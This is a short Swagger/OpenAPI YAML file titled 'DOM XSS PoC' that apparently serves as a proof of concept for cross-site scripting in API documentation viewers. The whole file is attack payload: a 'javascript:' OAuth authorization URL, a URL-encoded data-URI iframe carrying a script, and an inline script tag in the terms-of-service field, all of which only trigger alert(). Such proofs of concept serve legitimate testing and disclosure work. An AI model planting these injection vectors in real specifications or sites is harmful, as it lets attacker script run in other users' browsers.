swagger: '2.0'
security:
  - a: []
components:
  securitySchemes:
    a:
      type: oauth2
      authorizationUrl: 'javascript:alert(document.domain)//'
info:
  version: 1.0.0
  title: DOM XSS PoC
  description: <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  termsOfService: "<script>alert('xss')</script>"
paths:
  /:
    get:
      responses:
        '200':
          description: Echo GET
